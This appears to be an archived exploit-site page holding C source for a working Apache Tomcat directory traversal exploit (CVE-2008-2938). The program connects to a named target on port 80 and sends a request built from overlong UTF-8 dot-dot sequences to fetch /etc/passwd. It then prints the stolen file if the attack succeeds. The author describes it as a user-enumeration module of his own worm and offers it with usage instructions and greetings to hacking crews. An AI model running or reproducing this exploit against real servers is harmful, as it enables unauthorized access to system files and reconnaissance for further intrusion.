Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerabi

Posted on 28 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Apache Tomcat &lt; 6.0.18 UTF8 Directory Traversal Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================================
Apache Tomcat &lt; 6.0.18 UTF8 Directory Traversal Vulnerability
=============================================================


/*Apache Tomcat &lt; 6.0.18 UTF8 Directory Traversal Vulnerability get /etc/passwd Exploit
c0d3r: mywisdom
thanks for not being lame to change exploit author
tis is one of my linux w0rm module for user enumerations, i've dual os worm
thanks to: gunslinger,flyf666,petimati,kiddies,xtr0nic,c0mrade,n0te,v3n0m,iblis muda,cr4wl3r
thanks to: isa m said, whitecyber
thanks to all devilzc0de crews and members, all jasakom crews and members
    * EDB-ID: 6229
    * CVE: 2008-2938
    * OSVDB-ID: 47464
    * Author: Simon Ryeo
    * Published: 2008-08-11
    * Verified: Verified
greetz to inj3ct0r crews:
31337 Inj3ct0r Members:
 
cr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka,
 
Sid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r?, etc..
not so good but worth to try if our target directory structure has /usr/local/wwwroot
 
*/
#include &lt;stdio.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;errno.h&gt;
#include &lt;string.h&gt;
#include &lt;netinet/in.h&gt;
#include &lt;netdb.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;arpa/inet.h&gt;
#define EXPLOIT &quot;GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.0

&quot;
#define RCVBUFSIZE 9999 
#define tester &quot;root:x&quot;    
void cls()
 {
 char esc = 27;
 printf(&quot;%c%s&quot;,esc,&quot;[2J&quot;);
 printf(&quot;%c%s&quot;,esc,&quot;[1;1H&quot;);
 }
int main(int argc,char **argv)
{
if(argc&lt;2)
  {
   /**checking argument to avoid memory wasting for useless variables in vma**/
   cls();
   printf(&quot;
Apache Tomcat &lt; 6.0.18 UTF8 Directory Traversal Vulnerability get /etc/passwd Exploit
&quot;);
   printf(&quot;
c0d3r: mywisdom
&quot;);    
   printf(&quot;
usage:./tomcatevil hotname
&quot;);
   exit(1);
  }
else
 {
   
 int port=80;
 char echobuf[RCVBUFSIZE];
 int rval,sockfd, bytesrcv, totalbytes;
 struct hostent *he;
 struct sockaddr_in their_addr;
 if((he=gethostbyname(argv[1])) == NULL)
  {
   perror(&quot;
Sorry please recheck your target hostname !
&quot;);
   exit(1);
  }
  else
  {
   if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
     perror(&quot;socket()&quot;);
     exit(1);
    }
    else
    {
        //exploiting and try to get /etc/passwd
  their_addr.sin_family = AF_INET;
 
 printf(&quot;
[-]Checking whether port %d opens or not
&quot;,port);
 their_addr.sin_port = htons(port);
 their_addr.sin_addr = *((struct in_addr *)he-&gt;h_addr);
 memset(&amp;(their_addr.sin_zero), '', 8);
 if(connect(sockfd, (struct sockaddr *)&amp;their_addr, sizeof(struct sockaddr)) == -1)
  {
  perror(&quot;failed to connect !!!&quot;);
   
  }
 else
 {
 printf(&quot;
[+]Port 80 opens !!! now sending your exploit to our target
&quot;);
 if(send(sockfd, EXPLOIT,999,0)==-1)
   {
 perror (&quot;send&quot;);
   }
 else
   {
       totalbytes=0;
       while (totalbytes &lt; RCVBUFSIZE)
        {
        
        if ((bytesrcv = recv(sockfd, echobuf, RCVBUFSIZE - 1, 0)) &lt;= 0)
            {
 
            }
            else
            { 
              totalbytes += bytesrcv; 
              echobuf[bytesrcv] = '';  
                
            }
           totalbytes++;
        }
     
   
   }
 
   if(echobuf)
       {
         
        rval=strstr (echobuf, tester);
          if(rval)
             {
            printf(echobuf);
            printf(&quot;
[+]w00t!!! target vulnerable! exploitation success u may see /etc/passwd above !!!
&quot;);
            exit(1);
             }
             else
            {
            printf(echobuf);
            printf(&quot;
[-]target not vulnerable !!!
&quot;);
            exit(1);
            }
       }
 
 }
 close(sockfd);
 
 
 
       //eof exploiting
 
    }
   }
 
 }
 
 
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-28]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20